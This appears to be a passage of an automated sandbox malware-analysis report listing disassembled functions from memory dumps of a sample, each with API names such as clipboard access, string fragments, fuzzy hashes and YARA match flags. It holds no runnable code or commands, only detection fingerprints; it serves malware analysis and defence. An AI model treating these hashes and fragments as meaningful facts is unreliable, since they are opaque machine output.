                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocString
                                                                                                                                                                                                              • String ID: $#$$$-$1$:$>$>$K$L$d$i$n$o$y$z$~
                                                                                                                                                                                                              • API String ID: 2525500382-1891072806
                                                                                                                                                                                                              • Opcode ID: 647b49a2662ca06d22ed718d94df09998f8d52fb1802b4be85771e8266468ae5
                                                                                                                                                                                                              • Instruction ID: 234bba582f1fe30dad8659ab2c0e0ae3663df06b0bd7be8a9db9b1a8a4b70b39
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 647b49a2662ca06d22ed718d94df09998f8d52fb1802b4be85771e8266468ae5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0819F1010DBC28DD332877C885878BBFD16BA7224F084B9EE1E95B2E6D3B5414AC767
                                                                                                                                                                                                              Function 00431443 Relevance: 31.6, APIs: 1, Strings: 17, Instructions: 131memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocString
                                                                                                                                                                                                              • String ID: $#$$$-$1$:$>$>$K$L$d$i$n$o$y$z$~
                                                                                                                                                                                                              • API String ID: 2525500382-1891072806
                                                                                                                                                                                                              • Opcode ID: 647b49a2662ca06d22ed718d94df09998f8d52fb1802b4be85771e8266468ae5
                                                                                                                                                                                                              • Instruction ID: 05a644a41153f91ee80b5553e55b924670e2a3aa8ea9060e7a1cac42b4f7b768
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 647b49a2662ca06d22ed718d94df09998f8d52fb1802b4be85771e8266468ae5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2819E1010DBC28DD332877C885878BBFD16BA7224F084B9EE1E95B2E6D3B5414AC767
                                                                                                                                                                                                              Function 024A2087 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 108clipboardCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                              • String ID: 2$<$n$o$s$t$u$~
                                                                                                                                                                                                              • API String ID: 2832541153-770476204
                                                                                                                                                                                                              • Opcode ID: 4cf75824bb77db6feb025ec8c5d52b6a0034dd1d57225fd43b188b29fd98fd2b
                                                                                                                                                                                                              • Instruction ID: ec69d0c76f3935be6aa5aed2faeef2e734772d8812bd468da10911043c3bbe7e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4cf75824bb77db6feb025ec8c5d52b6a0034dd1d57225fd43b188b29fd98fd2b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 53417F7150C3818ED302EF78D89836EBFE1AF95308F08486EE4C987391D6B98589D763
                                                                                                                                                                                                              Function 024A122B Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 106COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$ClearInit
                                                                                                                                                                                                              • String ID: !$'$($.$1$4$6$9$=$Q$Nup=Nu
                                                                                                                                                                                                              • API String ID: 2610073882-4139624466
                                                                                                                                                                                                              • Opcode ID: 7da9eac6bc5900b3f9eed79fbec961309e3785d42a4584a6a34a6300cc1a9328
                                                                                                                                                                                                              • Instruction ID: 8180acd1f6ff68bd0cfccba9b48022a968f2c350ff4124d909ebaef635ec4952
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7da9eac6bc5900b3f9eed79fbec961309e3785d42a4584a6a34a6300cc1a9328
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B551297500C7C28AD325DB28849834ABFE1AB96318F884A5DF5E54B3D1D3B58106CB97
                                                                                                                                                                                                              Function 024A10C6 Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 80COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$ClearInit
                                                                                                                                                                                                              • String ID: !$'$($.$1$4$6$9$=$Q$Nup=Nu
                                                                                                                                                                                                              • API String ID: 2610073882-4139624466
                                                                                                                                                                                                              • Opcode ID: e068096e9ef50d3b99244f23823e7032d796396acd37f31884f1fb093adb9b4f
                                                                                                                                                                                                              • Instruction ID: 0f725ddc566d23078881b0f984d308080f8c5c2b29851bfa2630bbaccf0d1633
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e068096e9ef50d3b99244f23823e7032d796396acd37f31884f1fb093adb9b4f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4341087500C7C18AD326DB38848825BBFE16BD6228F885B9DF5E44B3D6C3B5810ACB57
                                                                                                                                                                                                              Function 024A0EDF Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 74COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitVariant
                                                                                                                                                                                                              • String ID: a$c$e$g$i$k$m$n$o$y${$}
                                                                                                                                                                                                              • API String ID: 1927566239-2118003515
                                                                                                                                                                                                              • Opcode ID: 90416240bba7897a47deb548982f418b908364f0c5a0e7009a2841c5a3c69bd2
                                                                                                                                                                                                              • Instruction ID: b77703685c75e3f40f728a2c7288e72b4e4b80eb0ecb71da8a50fc3fd3d0c0d7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90416240bba7897a47deb548982f418b908364f0c5a0e7009a2841c5a3c69bd2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F341F87440C7C18ED326DB38845879EBFD16BA6714F184A9DE4E54B3E2D7B98009CB63
                                                                                                                                                                                                              Function 00430C78 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 74COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitVariant
                                                                                                                                                                                                              • String ID: a$c$e$g$i$k$m$n$o$y${$}
                                                                                                                                                                                                              • API String ID: 1927566239-2118003515
                                                                                                                                                                                                              • Opcode ID: 90416240bba7897a47deb548982f418b908364f0c5a0e7009a2841c5a3c69bd2
                                                                                                                                                                                                              • Instruction ID: eb41e15997fb1c206cae957959327adc80bf2a0036b81b75fa1134588912eb61
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90416240bba7897a47deb548982f418b908364f0c5a0e7009a2841c5a3c69bd2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA41067440C7C18ED326DB38845879EBFE16BA6714F184A9DE0E54B3E2C7B98009CB63
                                                                                                                                                                                                              Function 00432BA9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4116985748-3916222277
                                                                                                                                                                                                              • Opcode ID: bc415b584f0f77bb1b4ca6257d9ef00a1587fbd480852c0384eb9785bec99b6d
                                                                                                                                                                                                              • Instruction ID: e56e9e0f058d18a549fd653ebbede2fa592e417b00ff4d17be629da631a13a6c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc415b584f0f77bb1b4ca6257d9ef00a1587fbd480852c0384eb9785bec99b6d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 665183B4E142099FCB44EFACD98569EBBF0BF48300F11852AE898E7350D774A945CF86
                                                                                                                                                                                                              Function 0249EFBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$ClearInit
                                                                                                                                                                                                              • String ID: Nup=Nu
                                                                                                                                                                                                              • API String ID: 2610073882-1345143215
                                                                                                                                                                                                              • Opcode ID: 726ad26f64245494e412dafe058d77943e3714867a1726721d66382b12cbc34e
                                                                                                                                                                                                              • Instruction ID: 065bb07f48806de785e01ccee5158cd53549613d2bf0cd810df5c8a87f2e76c4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 726ad26f64245494e412dafe058d77943e3714867a1726721d66382b12cbc34e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6941FA64208F828ED321DB3C8899797BFD1AB57220F084BADD4FE8B3D6D7646545CB12
                                                                                                                                                                                                              Function 0249E0A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$ClearInit
                                                                                                                                                                                                              • String ID: Nup=Nu
                                                                                                                                                                                                              • API String ID: 2610073882-1345143215
                                                                                                                                                                                                              • Opcode ID: 9fa876fbea1980471ab6180684191a9d68d3902139bc5f831a280a52ce881988
                                                                                                                                                                                                              • Instruction ID: b83810562b2679963c076cdf2f2184add93d7854ff341444d2a2e1ed75736bdc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9fa876fbea1980471ab6180684191a9d68d3902139bc5f831a280a52ce881988
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C341B424108FC28AD336CB7C8858797BED16B17224F084F9ED4FB5B2E2D76561058B62
                                                                                                                                                                                                              Function 0249D76C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Variant$ClearInit
                                                                                                                                                                                                              • String ID: Nup=Nu
                                                                                                                                                                                                              • API String ID: 2610073882-1345143215
                                                                                                                                                                                                              • Opcode ID: 70f12c80eb1663b6515cb72e61ec5afb4461b49987f20d74aa0986fc275e9ce5
                                                                                                                                                                                                              • Instruction ID: af3040c912096e76df03d612280fc9e8da893e643356fcd38022493fc9c85eb2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 70f12c80eb1663b6515cb72e61ec5afb4461b49987f20d74aa0986fc275e9ce5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A531A72050DFC18AE332CB388958797BFD26B67624F484B9CD0FA0B2D6D7666049C767